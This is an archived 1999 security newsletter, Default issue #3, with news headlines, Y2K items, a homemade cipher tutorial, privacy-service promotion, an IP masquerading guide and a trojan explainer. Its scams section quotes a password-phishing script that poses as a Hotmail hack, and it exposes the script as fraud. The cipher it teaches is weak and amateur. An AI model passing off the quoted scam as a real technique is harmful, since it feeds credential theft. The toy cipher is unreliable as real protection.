💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › DEFAULT › defau… captured on 2022-01-08 at 15:26:38.

View Raw

More Information

⬅️ Previous capture (2021-12-03)

-=-=-=-=-=-=-

--------------------------------------------------------------------------------
				Default newsletter Issue #3
				http://default.net-security.org
				27.08.1999 Help Net Security
				http://www.net-security.org
--------------------------------------------------------------------------------


TABLE OF CONTENTS
-----------------

I.	Editorial
II.	Last weeks news on Help Net Security
	a) Help Net Security news headlines
	b) Defaced Pages
III.	Y2K: As the millennium approaches
IV.	A look into basic cryptography
V.	Internet privacy: Freedom Network
VI.	Macintosh Security: F33r my hybride M4c, I'm coding!
VII.	Computing: A closer look at hard- and software
VIII.	Linux: IP Masquerading
IX.	Infection and vaccination
X.	Freedom of speech - related incidents
XI.   Scams - Getting something by all means 
XII.	Intrusion and detection part two



I. Editorial
------------

Hey people. We received good comments on Default newsletter from both individuals and 
security professionals. We have only 2 issues behind, but we will be even better (of
course with your feedback and help). If you would like to write an article for Default
newsletter please do e-mail us. Any help is appreciated. 
As you can see, this issue is little bit shorter. That is because Doug Muth didn't 
came yet from his holidays and Thejian and me were so busy this week. So do expect next
Default newsletter to be bigger and better than the previous ones.
In case you want to mirror Default newsletter on your site e-mail us also;)

Subscribing to Default newsletter:
send an e-mail to majordomo@net-security.org with a body message subscribe news your@email


Berislav Kucan
aka BHZ, webmaster Help Net Security
bhz@net-security.org

Xander Teunissen
aka Thejian, co-webmaster Help Net Security
thejian@net-security.org



II. Last weeks news on Help Net Security
----------------------------------------

a) Help Net Security news headlines

- Friday 20th August 1999:

	Default #2 released
	ABC compromised
	Belgian bank compromised
	Intel extends on-line privacy ban
	Homophobic web site "stolen" by hackers?
	Indonesia responds to cyber war threats
	Watching workers
	Carding in Newcastle
	
- Saturday 21st August 1999:

	Linux trojan in portmap.c
	FTP.exe overflow
	Biometrics in prisons
	Office 2000 also vulnerable to Jet flaw
	Former CIA director kept state secrets on home PC
	Furor rising over PV wiretap plan
	Student draws first net piracy conviction

- Sunday 22nd August 1999:

	MS security bulletin #30
	Sun says US army is testing Jini
	Hardencrypt
	E-commerce group formed to combat fraud
	ReDaTtAcK busted

- Monday 23th August 1999:

	Firm nabs cracker with intrusion detection tool
	First Net convict will do no time
	GAO risk-assessment report
	Sprint plans service to detect viruses
	US Government and inavasion of privacy
	East Timorese domain host denounces cyberwar
	Secure your web site
	DOD speaks on Y2K
	Bomb for Microsoft manager

- Tuesday 24th August 1999:

	ISS X-force advisory on Lotus Domino server 4.6
	Technology keys to tracking down Internet crime
	Govt. home-invasion bill
	Hackers scanning for trouble
	Norton AntiVirus 2000 is out
	Secret searches from DOJ
	SSL CPU consumption causes concerns
	Unix: It doesn't need to be so insecure

- Wednesday 25th August 1999:

	Shoutcast compromised
	HK police to establish computer crime team
	Smith admitted to creating Melissa
	New IE5 bug worst then ever?
	Audit office blasts agencies' serious security flaws
	Malicious attack on linux-kernel mailinglist
	More cyber-war threats

- Thursday 26th August 1999:

	Taiwan circles wagons in cyber-warfare
	UK webhosting company hit by virus
	Netscape issues web-server fix
	Windows and bugs? Nooooo?
	CWI cracks 512 bit key
	Mounting an anti-virus defense
	Tracing stolen computers through RC5
	Self destructing e-mails? Nice
	Y2K problems in Pakistan
	Retrospective on cracking contest
	Y2K test

http://net-security.org - Daily security related news
http://net-security.org/news - News archives
http://net-security.org/headlines.shtml - Add HNS headlines to your web-site

b) Defaced pages: (mirrors provided by Attrition (http://www.attrition.org))

Site: Red Hat Indonesia (www.redhat.or.id)
Mirror: http://default.net-security.org/3/www.redhat.or.id.htm

Site: Official Web site of Limp Bizkit (www.limpbizkit.com)
Mirror: http://default.net-security.org/3/www.limpbizkit.com.htm

Site: Monica Lewinsky's site (www.monicalewinsky.com)
Mirror: http://default.net-security.org/3/www.monicalewinsky.com.htm

Site: Madison Square Garden (www.thegarden.com)
Mirror: http://default.net-security.org/3/www.thegarden.com.htm

Site: The State University of West Georgia (www.westga.edu)
Mirror: http://default.net-security.org/3/www.westga.edu.htm

Site: Rock.com's Rolling Stone's Web site (www.stones.com)
Mirror: http://default.net-security.org/3/www.stones.com.htm


III. Y2K: As the millennium approaches
-------------------------------------

These weeks' Y2K headlines:

The computer network used by many Vermont police agencies and other 
emergency services went down for two days this week while technicians 
were preparing the system for the year 2000. While it was down, 
prosecutors had problems getting police paperwork, reporters couldn't 
get routine releases, and motorists needing copies of accident reports 
were out of luck. Officials do not yet know why the computer crashed. 
They do know it happened as technicians were upgrading the system to 
prepare for Y2K. It took more than two days to get the system running 
again. In the meantime, much of the record-keeping had to be done the 
old-fashioned way: with pen and paper. 

PC Week reported about MS Excel Y2K problems: 
"Unless users of Microsoft Corp.'s Excel download scanning tools from 
the company's Web site, their spreadsheets could go haywire when they 
open their files on Jan. 1. 
A Boston-based technology management consulting company has found that 
an Excel year 2000 error causing drastic math errors went undetected 
by a handful of Y2K analysis tools. 
The core of the problem is that Excel versions through Excel 2000 have 
a DATE() function that treats all two-digit years as 20th-century dates, 
regardless of how Excel is configured to handle two-digit dates. As 
a result, spreadsheets that use the DATE function are particularly 
vulnerable to Y2K problems. (By default, Excel 97's and Excel 2000's 
other date functions, as well as the software's data entry routines, 
treat two-digit dates less than 30 as part of the 21st century)"

The Millennium Bug that promised to swell U.S. courts with lawsuits 
arising from damage that may occur if a computer system fails to 
recognize the Year 2000 so far has resulted in only 74 cases filed, 
according to a report released Monday by PricewaterhouseCoopers.
The trickle has the potential to turn into a full fledge flood after 
the clock strikes midnight 1999, some experts said.
As of June 30, there were only 74 cases filed in state and federal 
courts against 45 defendants that related to the Year 2000 computer 
glitch (Y2K), according to the report.

Karen Shaw completed her 39-day trek across the state in which she 
set out to promote Y2K awareness to rural residents of Oregon. 49 year 
old teacher started her journey to show others that Y2K is coming very 
soon, and they must be prepared. Shaw left Medford with only $20 but 
said she lived on the generous donations of food and cash from people 
she encountered along the way. She said: "I did not come across any 
panicked people, but very practical, grounded, spiritual, caring people
who are just doing what their hearts tell them to do".

Hundreds of people in Japan complained Sunday after their automobile 
navigation systems went haywire - the result of a Y2K-like glitch in 
the satellite system used in navigation devices worldwide. Screens went
blank and bizarre symbols turned up on the electronic navigators, 
essential for millions of drivers in a country where urban streets are 
a chaotic jumble. Pioneer Corp, a major manufacturer of car navigation 
systems, received about 600 calls on its help hotline, said company 
spokesman Hidehiko Shimizu. Shimizu said callers were directed to the 
nearest repair shop, where their systems were fixed for free.

Y2K TOOLS
---------

TITLE: Outlook Express Year 2000 Update  
SIZE: 140 Kb
TYPE: Freeware
REQUIREMENTS: Windows 95/98/NT, Outlook Express 4.01
DOWNLOAD: http://default.net-security.org/3/en-x86-Q234681.exe

INFO: Part of Windows 98 Service Pack 1, this program will resolve a 
year 2000 issue with Outlook Express 4.01. The year 2000 issue occurs 
when receiving an IMAP mail message or a News message with a two-digit
year as the sent date. The date can be misinterpreted under certain 
conditions. For example, if the two-digit year is anything other than 
'99, Outlook Express assumes the century value is the same as the 
current century. If the current year is 2000, and a two-digit date is 
received as '97, then the year will be interpreted as 2097. However, 
there is one special case when different logic is applied. If a 
two-digit year of '99 is received and the current year is a multiple 
of 100 (e.g., 2000), the year will be interpreted as the current year 
plus 98 (e.g., 2098).



Berislav Kucan
aka BHZ
bhz@net-security.org
http://net-security.org



IV. A look into basic cryptography
----------------------------------

  
This is where I left off when I was working on the HOWTO last.... so 
from here on in is new and (slightly) improved.
I probably have my terminology wrong, but the next is what I think is 
called an output feedback cipher.
It takes the output from one step of applying the cipher, and uses 
that to apply the cipher to the next part.
This is the most simple method of an output feedback that I could think
of.
First index the alphabet in some manner, it could be using ascii values, 
or it could be a simple 1-26 method (I suggest ascii because then you 
will allow for punctuation, I used a simple 1-26 because it is easier 
to explain the cryptosystem).

A=1 B=2 C=3 D=4 E=5 F=6 G=7 H=8 I=9 J=10 K=11 L=12 M=13 N=14 

O=15 P=16 Q=17 R=18 S=19 T=20 U=21 V=22 W=23 X=24 Y=25 Z=26 

This is a very basic transposition cipher as is, but will soon change.

The algorithm in mathematical terms is:

(N+P(1))%26=C(1)

(N+C(1)+P(2))%26=C(2)

(N+C(2)+P(3))%26=C(3)

(N+C(3)+P(4))%26=C(4)

...

(N+C(r-1)+P(r)=C(r)

This may seem complicated, but its not.

N is a random number that will be passed on as a key. I suggest a 
larger number to protect yourself from a brute force attack. Do not 
use a number divisible by 26. In fact, for safety's sake, try using a 
larger prime, or a product of two smaller primes.

C(1) is the first ciphertext letter

P(1) is the first plaintext letter

r is the total number of characters in the message.

 

% is the mathematical symbol for the function modulus.

Modulus is like the remainder after dividing an integer by another integer.

So 28%26=2

and 942%26=6

(if your calculator doesn't handle modulus, a simple way to do it would be...

942/26=36.2307692307692307692307692307692

36.2307692307692307692307692307692-36=.2307692307692307692307692307692

.2307692307692307692307692307692*26=6

(round, your calculator cant handle these decimals -windows calc in 
scientific mode can handle modulus, the key you are looking for is Mod)

You take your message. Lets take the word hello for simplicities sake.

HELLO

first change it to corresponding numbers.

8 5 12 12 15

our key number will be... 73. (once again, I suggest a more secure key 
number than this, but this will serve our purposes well.)

1 2 3 4 5

8 5 12 12 15

Restate the Algorithm...

(N+P(1))%26=C(1)

(N+C(1)+P(2))%26=C(2)

(N+C(2)+P(3))%26=C(3)

(N+C(3)+P(4))%26=C(4)

...

(N+C(r-1)+P(r)=C(r)

And begin applying the algorithm:

H (73+8)%26=3 

E (73+3+5)%26=3

NOW you see the power of a more complicated cipher. Here 3 stands for 
both H AND E

L (73+3+12)%26=10

L (73+10+12)%26=17

Once again, the power of a more complicated cipher. while 3 stands for 
both H and E, L is represented by both 10 and 17.

O (73+17+15)%26=1

3 3 10 17 1

Then take these numbers, and transfer them back to letters.

A=1 B=2 C=3 D=4 E=5 F=6 G=7 H=8 I=9 J=10 K=11 L=12 M=13 N=14 

O=15 P=16 Q=17 R=18 S=19 T=20 U=21 V=22 W=23 X=24 Y=25 Z=26 

CCJQA

Now you ask how do you get back to the original "HELLO"?

Well first you need to find a way to tell someone the key number.... I 
suggest appending it to the beginning of the message, go back to how it
was in numbers. (Note, if someone knows the method you used to hide the
key number in the message, the security of the message is lost. This is
the case with all single key cryptosystems.)

3 3 10 17 1

here the code number was 73. that's 2 letters.

add 2 7 3 to your message in the beginning

2 7 3 3 3 10 17 1

then make it the text

B G C C C J Q A send that to someone. They extract the numbers, and then
the key 

number of 73.

 

Here's an idea, I will make this section somewhat interactive. 

If you can decrypt this message back to the original text of HELLO, 
please send your analysis of how to decrypt it using mathematical terms
to crypto@net-security.org. 

Ill go over all the emails and post who was first, and then go over it 
in the next issue.

Have fun.

-Iconoclast



V. Internet privacy: Freedom network
-----------------------------------------

The Freedom Network plays an integral role in Zero-Knowledge's
absolute privacy solution - Freedom.

Here's a quick look at what exactly the Freedom Network is 
and what it does.

You'll often hear Freedom referred to as client/server
software, but what does this really mean? Well, the 
"client" part is the software you install on your personal
computer and the "server" part is the software that runs 
the Freedom Network. 

The Freedom Network is a series of servers distributed 
among ISPs and organizations around the world. 

Internet traffic normally travels from source to 
destination unsecured (i.e. not encrypted) while passing 
through certain servers which can be easily identified. 

This is like sending confidential information using a 
postcard - anyone who handles the postcard knows the 
sender, the recipient and the contents. This unsecured 
delivery system makes message interception, falsification 
and tracking possible. 

To solve this problem, Freedom encrypts all Internet 
traffic and routes it through a series of anonymous Freedom 
servers, known as the Freedom Network.

Each server in the chain knows only the previous and 
following servers in the path, and nothing about the traffic 
(data) that it's handling. This makes the system extremely 
secure since no single server knows both the origin and the
destination of the traffic.

In fact, no one, not even your ISP, can monitor your web 
activities. 

Does My ISP Need A Freedom Server For Me To Use Freedom?

It's important to note that your ISP doesn't need to run a 
Freedom Server for you to enjoy the benefits of Freedom. If
they do opt to host one, however, you may notice an increase
in browsing speed while running Freedom. This will be 
explained in greater detail in the next section.

- Network Speed

We often talk about what effect running Freedom will have 
on your Internet connection speeds. These are also known as
"latency" issues. 

Freedom employs a number of systems to foil any attempts at
analyzing Freedom user's Internet activities. The net 
effect of these systems can result in slightly slower
connection speeds for some users. The exact latency, if 
any, that a user will experience while running Freedom 
depends on many factors, including;

- proximity to a Freedom Server
- geographic location relative to the Internet backbone
- the speed of your connection
- random Internet bottlenecks or "traffic jams"

When a user running Freedom connects to the Internet 
through their ISP, that connection will use a greater 
amount of bandwidth than a non-Freedom connection. As 
mentioned above, this is due to the extra systems Freedom 
employs to ensure user privacy. 

This extra bandwidth consumption will be more taxing on an
ISP's servers as the Freedom user's traffic passes though 
their system on its way to the first Freedom Server on the 
Freedom Network.

If, however, the user's ISP is hosting a Freedom Server, 
that server will be able to intercept this traffic much 
earlier, thereby streamlining the entire process. This, in
turn, will result in quicker connection speeds for the 
Freedom user.

To sum up, the closer a Freedom user's computer is to the 
first Freedom Server, the less latency a Freedom user will
experience. Since the closest a user can possibly get to a 
Freedom Server is if their ISP is running one - alerting
your ISP to the benefits of running a Freedom Server is a 
good idea! :-)

For an up to date listing of worldwide Freedom Server 
operators, please visit:
http://www.zeroknowledge.com/partners/founders.asp

Please keep in mind that this list gets bigger every day
as more server operators sign up so be sure to check back
often.

- Security Issues

"How is it possible that my ISP can't monitor my activities 
since all my communications pass through their servers?"

Simple - all the data leaving your machine is encrypted 
using strong crypto, which means that no one, not even 
your ISP, can watch what you're doing. 

In fact, whether you're sending email, surfing the Net, 
chatting or posting to newsgroups, Freedom ensures that
your activities remain private!

Why should I trust your security when other supposedly 
invulnerable codes and systems have been cracked?

- Software

Zero-Knowledge uses established public algorithms that have 
proven to be impervious to attack. Well-known public algorithms 
like Diffie/Helman, Triple DES, Blowfish and others ensure that 
the system will remain secure. ZK is uncompromising in its 
testing and implementation of encryption technology, using only 
established algorithms with unbreakable bit lengths - we do NOT 
cut corners.

- The More Bits, The Stronger The Encryption 

As a Canadian company, ZK can export encryption technology far 
stronger than the US Government's 56-bit encryption export standard. 
A document encrypted with 56-bit key length would have 
72,057,594,037,927,900 possible keys. Freedom's encryption begins 
at 128-bit key length, meaning it has 
340,282,366,920,938,000,000,000,000,000,000,000,000 possible keys. 
A supercomputer capable of trying one million keys per second in 
a brute-force attack would require 10,000,000,000,000,000,000,000,000 
years to find the right key. That's a long time.

- Personnel

A number of experts in the field of privacy and cryptography have 
estimated that there are perhaps five people in the world capable of 
designing and lending credibility to a system of this complexity. ZK 
Chief Scientist Ian Goldberg appears on that short list.

ZK sought out Mr. Goldberg because of his reputation for cracking 
other supposedly secure systems. As a grad student at USC Berkeley's 
Internet Security Applications Authentication and Cryptography Group, 
Ian cracked the 40-bit DES code in the RSA Data Security Challenge in 
just three and a half hours. He also earned international recognition 
for his part in breaking the Netscape SSL encryption system, as well 
as the cryptography system used in the GSM cellular phone standard.

- Peer Review 

Freedom has always been and will continue to be opened up for independent 
review by acknowledged industry experts.

-- Bruce Schneier of Counterpane Systems will audit the source code 
line-by-line to ensure that no cracks, holes or errors exist in the 
encryption implementation. Mr. Schneier, another short-list member, 
is well-known as a veteran cryptographer and author of Applied Cryptography:

Protocols, Algorithms, and Source Code, widely recognized as the bible of 
cryptography. 

Complete Privacy

ZK puts its customers' privacy first - with no exceptions. Unlike 
key-escrow or third-party systems, Zero-Knowledge (as implied by its name) 
is unable to determine who is behind a given pseudonym -- even under threat 
of force. 


Jordan Socran
Zero Knowledge Systems 
(http://www.zeroknowledge.com)



VI. Macintosh security: F33r my hybride M4c, I'm coding!
-------------------------------------------------------------

Most underground mac users are facing the same problems: only very few
people are actually coding  network security tools on Mac. The main 
reason is that coding a tcp/ip stack would take hundred of lines just 
to initialize. Today many products are offering a easy approach to 
programming, developing a project in RealBasic (http://www.realsoftware.com)
is much more easier than in CodeWarrior (http://www.metrowerks.com) 
even if each have sepecificities and use different language. 
Security software are ,usualy, not very big since they're focused on one type of
vulnerability.
It takes a long time to code, to debug a program.Another way to create 
your own tools is to use other languages, faster to code and to use.
Many cross platform languages exist.Most useful are C/C++, Visual Basic,
perl, ph3, java, rebol and much more. Rebol is a new great language 100% 
network oriented (http://www.rebol.com), it easy to code. You can do 
many things from basic mail client to databases, table builder, port 
scan. In few minutes you can build for example a scanner for a remote 
vulnerability on ip ranges. I made few month a cgi-check like in rebol, 
it scans around 70 famous vulnerabilities it took few minutes to 
adapt it from a C source. Plus the code is used by a virtual machine 
(available for 17 OS), and it quiet fast. Don't expect an well designed 
software with full of color because it's commande line only. 
Another language is perl. Many sources are available in the security 
domain, you can easily use those with Macperl and or with a local 
webserver. Make sure those sources are likely to be used on your os to 
even think about using a firewall admin tool in perl.... Anyway if you 
plan to use other languages that can't run on MacOs you can use a 
emulation, or install Linuxppc.
The macintosh with tools like "realbasic" allow you to build 
software in an almost ligne free of code way.Everything is performed 
graphically, except all commands.
The compiler allows to build software for macOs and for wintel.
For java it's more difficult to code even if tools jdk are 
available for mac.
It'll ask you alot of patience.If you just start programming, and want 
to learn fast you'd better start with RealBasic.Many people from the mac
underground scene code with realbasic, for example Portsniffer
(http://software.theresistance.net) is a great product.It's one of the
fastest port scanner I've ever seen on Mac. Another alternative is MacOX, 
a unix like made by Apple.Many unix tools are available or usable on 
this OS.It's a Unix easier to configure since MAcos computer have less 
type of hardware. Before you choose any languages you'd better learn how
to code, sometimes it takes years to  claim to know a language.Don't 
for get that only the limit you have is your imagination!

deepquest 
deepquest@default.net-security.org

All rights not reserved- Serving since 1994
http://www.deepquest.pf



VII. Computing: A closer look at hard- and software
----------------------------------------------------

Intel Celeron CPU has been introduced at the end of June 1998 with the version at 
266 MHz of clock, aiming at balancing the success of AMD K6-2 processor released a 
month before. It used the Deshutes Core at 0.25 microns of Pentium II CPUs but it 
didn't have L2 cache; this technical solution allowed to obtain high performance 
with floating point calculation due to the floating point processing unit (FPU) 
identical to that used with Pentium II CPUs, but it is a big gap with integer 
calculations, both in comparison to K6-2 and Pentium II, due to the lack of L2 cache. 
In July 1998 the version at 300 MHz of clock has been released always without L2 cache, 
while at the beginning of September the versions 300A and 333 MHz have been launched, 
with L2 cache at 128 Kbytes working at the clock frequency (against 512 Kbytes at half 
clock frequency of Pentium II CPUs) and put within the Core of the processor (on die). 
The introduction of the L2 cache allowed to reduce the gap with performance with integer 
calculations of the previous versions of Celeron CPUs making this processor a perfect 
solution in every field. The technical features of Celeron CPU up to September 1998 can 
be summarized as following:

� Deshutes core at 0.25 microns (as for Pentium II CPUs), which is called Mendocino for 
  CPUs including L2 cache and Covignon for those without L2 cache; 
� L1 cache at 32 Kbytes divided in two parts each with 16 Kbytes respectively for 
  instructions and data (as for Pentium II); 
� L2 cache at 128 Kbytes working at the clock frequency and put on die (in Pentium II it 
  amounts at 512 Kbytes working at half clock frequency and put on the processor cartridge, 
  outside the cpu's Core); 
� Frequency multiplier locked both upwards and downwards; 
� Bus frequency at 66 MHz against 100 MHz of Pentium II CPU; 
� SEPP package, that is based on cartridge and use of Slot 1 motherboard (the same used 
  by Pentium II CPUs). 


Intel marketing has always maintained a low cost for Celeron processors, on one side to 
compete with AMD K6-2 on low-end market, on the other to avoid to add an expensive product 
to Pentium II. Let's note two aspects:

� Celeron uses a bus frequency of 66 MHz while that of Pentium II is 100 MHz; if in practice 
  the differences in performance between the two solutions, with the same clock frequency, 
  are reduced, to the user the first seems to be cheaper, while the second seems to be more 
  "professional" so many buy systems based on Pentium II with more profits for Intel. 
� The performance of Celeron Mendocino and Pentium II, with the same clock frequency, are 
  almost aligned; Pentium II has a big advantage if used with server, where the presence of 
  L2 cache 4 times bigger, even if working at half clock frequency, is evident. For this 
  reason, Intel has always maintained an high clock difference between the to CPUs, so to 
  avoid that power users buy Celeron with higher frequency, less profitable than Pentium II. 


At the beginning of 1999 a new version of Celeron Mendocino CPU has been released; if the 
technical features are the same, the package of the CPU, that is SEPP one, has been 
substituted by a PPGA one:

SEPP Package: it is installed on Slot 1 and it is similar to a Pentium II CPU without 
external plastic cover; note in the middle, the CPU core and the space on its sides where 
there are the chips of the L2 cache with Pentium II CPUs.

PPGA Package: very similar to a Pentium MMX CPU it is more compact in comparison the SEPP 
version and it is installed on Socket 370.


Officially the reasons which led to the introduction of PPGA package aimed at reducing 
the production costs of the processor, as the SEPP package, an heritage from Pentium II, 
wasn't worth to exist anymore as the L2 cache is anymore put on it but directly within 
the CPU Core.
Another reason, linked to marketing, is that of making the processor market more selective: 
Slot 1 for more "professional" systems based on Pentium II and Pentium III processors, 
Socket 370 for those cheaper based on Celeron CPU. Up to the version at 433 MHz both 
variants of Celeron, SEPP and PPGA, were available, while from the version at 466 MHz on 
SEPP was almost completely abandoned.
Celeron CPU was very successful due to its general performance in every field and to its 
high overclockability which characterized almost every version; with these processors it 
was possible to achieve high clock frequencies, higher than those of Pentium II processors, 
with a very reduced investment. This article aims at checking the overclockability of 
Celeron CPU and finding, where possible, which is the best version of Celeron CPU in 
comparison to the price and the performance.

Damir Kvajo
aka Atlienz
atlienz@default.net-security.org



VIII. IP Masquerading: Multi-computer access to a network via single interface on the server
-----------------------------------------------------------------------

IPmasq basis:
When you set up IP Masquerading system on your Linux servers,
other machines on the *local* network will be able to use
the single network interface on the server. The most common usage
is to provide internet access to other machines, which do not
have their own connection.


The difference between Linux IPmasq and Windows tools (i.e. Wingate)
The is a big difference between the two. IPmasq is the "IP forwarding 
system", while Wingate acts as a proxy. So, to make the machine 
use the wingate, each application has to be configured separately,
while to use IPmasq, one just have to set up a "default gateway" 
for the machine. Further adjustments of client permissions are set
on the server side (by modifying the firewall rules). Also, 
IPmasq is capable of forwarding any kinds of protocols, even those
which does not have a special IPmasq helper application.


Kernel options.. To enable IP masquerade in the kernel, select:
- ip firewalling- packet filter firewall on a Linux box
- ip always defragment- neccessary for ipmasq to work. The packet is 
defragmented (put into one piece from the network fragments) on the server
and then goes "to the court".
- ip masquerading- actual ip masq support
- transparent proxy support- by selecting this option, client machines think
they communicate with the end server, while infact it is a local proxy.
- ICMP masquerading- adds IPmasq ICMP support (without this, the system 
does it only for UDP, TCP (and ICMP errors).
- ipmasq special modules support
- ipautofw masq support
- ipportfw masq support
(optional)
- optimize as router


Tools to get:
- ipmasq (the automatic ipmasq script, very useful, just be sure to 
	get the new one with the ipchains support in it)
- ipchains
- ipautofw
- ipportfw 
- ipmasqadm (special modules support)


Once you are finished with the kernel configuration, compile it and
install the new kernel. Add:
echo "1" > /proc/sys/net/ipv4/ip_forward
to some of your system initialization scripts (or do it manually).


After you raise the interface you want others to use (usually ppp0),
just run "ipmasq" to recompute firewall rules. By default, IPmasq
allows only the local network to use the interface.


Client side adjustments:
Linux:
as root, execute:
route del default; route add default gw your.servers.ip.address
You can see the current routing table by issuing "route", active
connections with "netstat", interfaces with "ifconfig"

Windows:
as any user (9x) click Start->Settings->Control panel->Network->
TCP/IP-network device and in the Gateway tab, add your server's IP
to the list.
dev
dev@net-security.org



IX. Infection and vaccination
----------------------------

Since school is back in for a lot of people, the number of trojans 
being made/updated has decreased(same with the length of this article).
So, this is the first of a few articles that simply explain general 
info about trojans, to help remove them. We also have info on the new 
LockDown 2000.  

As most people know a trojan is a program that says it will do something 
and then does something else. Currently the only security hole trojans
take advantage of is someone willing to run a program. Here is the 
general way most trojan infect people:
1. Someone is tricked into running the trojan
2. Then it copies to another location
3. After that it starts listening for connections
4. Writes to the registry so it will load with Windows

Windows lets programs autoload when booting many different ways. Just 
about everyone knows about the startup folder on the start menu. Most 
trojans don't use this method, though we have seen at least one that 
did. Another autoloading method is via the registry. This is the most 
common way a trojan uses to start with windows. While lesser known is 
the win.ini and even system.ini. 

A common thing to do among trojan users is to "bind" the trojan they 
want to infect someone with. Binding allows them to make a harmless 
program into a dangerous one. Popular trojans such as DeepThroat and 
SubSeven come with such tools. While many separate tools exist and are 
easily found that do the same(such as silkrope). Binding also makes it 
more difficult to be picked up by virus/trojan scanners, but it still 
is possible. 

We are lucky to view and get info on LockDown 2000 Version 4.0 
Pre-Release. This version fixes some minor bugs and adds some more 
control to the user. Also another handy feature is upon exiting it 
saves the configuration changes you made. Plus the trojan count has 
been increased to 378. Unfortunately the price is still probably high 
at 99 US dollars. We also have not had the chance to personally test 
it, maybe by next week we can. 


zemac
zemac@dark-e.com
http://www.dark-e.com



X. Freedom of speech - related incidents
------------------------------------------


Independence is my happiness, and I view things as they are, without 
regard to place or person; my country is the world, 
and my religion is to do good. 

- Thomas Paine


Every day the battle between freedom and repression rages through the global ether.  
Here are this week's links highlights from NewsTrolls(http://www.newstrolls.com):
----------------------------------------------------------------------

Weekend August 20-22

US redoubling efforts to 
<http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_3.html>
invade encrypted privacy
 
And the US DOJ wants easier 
<http://www.washingtonpost.com/wp-srv/business/daily/aug99/encryption20.htm>
covert action capabilities 


-----------------------------------------------------------------
 Monday August 23

Recently freed Lafitte says the World Bank is to blame 
<http://www.insidechina.com/features.php3?id=87242.>
for the detentions...
 
"Lafitte, a Tibetan expert, said he had grave fears about the safety 
of his local translator, Tsering Dorje, and for Meston, who reportedly 
suffered spinal and internal injuries when he jumped from a building 
while trying to escape police. "The World Bank must bear direct 
responsibility for what happened and must act with its unique leverage 
as the biggest provider of capital to China to do something to help both 
the American, who is in trouble but at least has the American government 
to help him. "And particularly I feel it's the responsibility of the 
World Bank to do something for our translator, who has no government he 
can turn to...to protect him," he said." 

Under Chinese detention for investigating World Bank program, 
<http://www.washingtonpost.com/wp-srv/inatl/feed/a30394-1999aug23.htm>
Meston, an American, somehow fell out of a 3-story building and broke his back... 

"The men assigned to monitor Lafitte told him at least three times that he was 
lucky he was Australian, and not American, because the United States had bombed 
China's embassy in Belgrade. "America is always trying to hold us back, 
trying to make us weak," he recalled one saying." 


-------------------------------------------------------------------
Tuesday August 24

The Federal Reserve Board's opposition to 
<http://www.innercitypress.org/frreport.html>
the Freedom of Information Act... 

Thousands of Mexican Indians and Zapatista supporters 
<http://asia.yahoo.com/headlines/240899/world/935433360-90823183648.newsworld.html>
march in protest against military presence in Chiapas 

African consumers speak out on 
<http://www.africanews.org/atlarge/stories/19990823_feat5.html>
product dumping and market liberalization at their expense...
 
"According to Consumers International, consumption per capita in Africa has 
gone down by 20 percent over the past 20 years. Under the current exchange 
system, Least Advanced Countries will lose up to 600 million US dollars per year. 
This painful reality is contrary to the main objectives of the WTO charter, 
which requires signatory parties to recognise that the objective of their 
trading and economic relations must be to raise the living standards of the 
populations through employment of higher incomes. This is why African consumer 
organisations have been pressing decision makers and multinational companies 
to stop regarding consumer rights as a hindrance to trade and investment." 

----------------------------------------------------------------------
Wednesday August 25

Iran paper calls for 
<http://asia.yahoo.com/headlines/250899/world/935575740-90825100957.newsworld.html>
pre-election live TV debates...
 
"The Iran News also said conservative-dominated state television has 
"shied away from the clash of ideas" and that its programming has 
"not been able to quench the public thirst for more accurate and 
impartial information.""

He Zhaohui, 32, labor activist gets 10 years in prison for 
<http://www.insidechina.com/news.php3?id=87778>
"providing information to overseas organizations" 

"He, who organized over 10 workers' demonstrations in Chenzhou in 1997 and 1998, 
reported workers' protests in the province to democracy movements and human 
rights organizations in the United States, the center said." 

Over 10,000 pro-independence demonstrators 
<http://asia.yahoo.com/headlines/250899/news/935568600-90825081041.newsasia.html>
rally in Dili ahead of East Timor elections...
 
More on 
<http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_429000/429563.stm>
the rally... 

"One of the organisers, Agio Pereria, said a clear message was being 
sent to anyone planning to sabotage the ballot and abort the consultation 
process. "Don't stop our people to reach the ballot box, because this is 
a right," he said. "Each individual has his or her right to exercise the 
right to vote in peace. And we hope that this is the message that we 
send today." 
diva aka Pasty Drone
NewsTrolls, Inc. , http://www.newstrolls.com
pastydrone@newstrolls.com



XI. Scams - Getting something by all means 
------------------------------------------

This article will talk about common light Internet scams that could 
happen to everyone who is not careful (but do note that they will often
happen to the people who have not great knowledge in computers,
especially in some basics of Internet surfing.
I don't know but lot of wannabe "hackers" think that they must start
with hotmail or yahoo hacking. They want to get someone's e-mail 
password so they could read his e-mail, tease the "victim" and to
get some passwords (like if the victim has registered a webpage with
corrupted e-mail, attacker could easily snatch it). Even when I started
working on net-security, I got lot of e-mail saying like: "Help me to
hack a hotmail account". Better advise to this people is to start 
learning something that could really be useful to them.

(1)
  Hotmail "hacking" (this one is almost legendary, because this "way
  of hacking" could be found on almost every Usenet group which has 
  hack in its topic.

<********************************************************************>

First, start with opening your own hotmail address. 
Select compose. 
Type in : 

To: emailoftheattacker@hotmail.com    

Subject: HTM.MSN.PW.REQ 
(It is absolutely necessary to type in CAPITALS - subject 
headers are case sensitive ) 

Message: 
[First line] The login name of the person you want to hack 

[2nd line] Your own password. 
Because the automatic hotmail responder will require your 
"systemadministrator password" which is in fact are your own password! 
But the computer doesn't know that

[third line] x3iZ0k45-MSN-6TqGW-reqf47890sys (case sensitive) 

How it works: 
You mail to a systemadministrators automatic responder. 
Usually only system administrators should be able to use this 
( when for example getting lost passwords ), but when you try it 
with your own password and mail the above explained message from your 
hotmail account the computer gets confused! 
MSN will respond with an automated message indicating the password requested
NOTE that if the message you send MSN is composed incorrectly, 
or there has been a change in the status of the user queried,
you may not get an automated response 
In this event, you will need to resubmit the request.
This "trick" usually takes about 4 hours to get a reply of.

<********************************************************************>

I am sad to say, but according to the critics of victims on usenet, 
this fraudulent activity works on someone. This whole story with
sending your own password is bogus and it isn't also very imaginative.
I came across this page on Geocities, and it is just a little bit
modernized version of an old fraud, that we wrote about on net-security,
exactly 10 months ago (sending your password was then explained like 
this: "By doing this, the computer which receives the email believes you
are a Hotmail System administrator, and sends you the password you 
require within 1-2 hours"). 

(2)
  AOL web fraud

I came across on this trick, by reading attrition's mirrors of hacked
pages. Originally the site for this scam was on www.arodnet.com with
a backup on pages.hotbot.com server. Just to note that this page is as
